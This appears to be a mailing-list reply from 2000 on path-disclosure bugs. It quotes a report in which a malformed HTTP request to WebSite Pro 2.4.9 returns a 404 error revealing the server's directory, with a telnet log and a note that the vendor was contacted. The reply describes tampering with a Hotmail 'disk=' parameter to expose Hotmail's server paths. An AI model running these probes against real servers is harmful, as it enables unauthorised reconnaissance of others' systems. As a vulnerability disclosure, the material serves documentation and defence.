How? Get into your Hotmail account. After you are logged in, modify in the
string address the part with "disk=" in something like
"disk="abc.beh.doh.cih_". I mean to put string text in the place of the IP
address. It will give you a nice error revealing directory structure of
server and you will be able to understand after this a big part of address


On Thu, 13 Jan 2000, Lark Lizerman wrote:

> I got a tip from Noah Rathaus about WebSite Pro latest version(2.4.9). He mentioned 
>a server
> where WebSite Pro. 2.4.9 is run.
> I discovered, that also the latest version is vulnerable to the bug of revealing 
> In the new version there must be made a change to retrieve the directoryname.
> When you connect to a server send the command line:
> GET /HTTP1.0 \
> You have now to add a space before the last backspace of the commandline.
> That makes the server respond with a "404" error and and prints the directoryname.
> Here is the part from the logfile of Windows Telnet Client:
> GET /HTTP1.0 \
> HTTP/1.0 404 Not Found
> Date: Thu, 13 Jan 2000 20:47:12 GMT
> Server: WebSitePro/2.4.9
> Accept-ranges: bytes
> Content-type: text/html
> Content-length: 216
> <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
>                                                <BODY bgcolor="White"><H2>404 Not
>  Found</H2>
>            The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c
> :\1Web\docs\website\HTTP1.0)</CODE><P>
>                                       </BODY></HTML>
> Here it shows us the directory "c:\1Web\docs\website\".
> Status: Vendor contacted and informed about the bug.
> Expecting statement about fix.
> -------------------------------
> Lark Lizerman
> Contact:
> or
> -------------------------------

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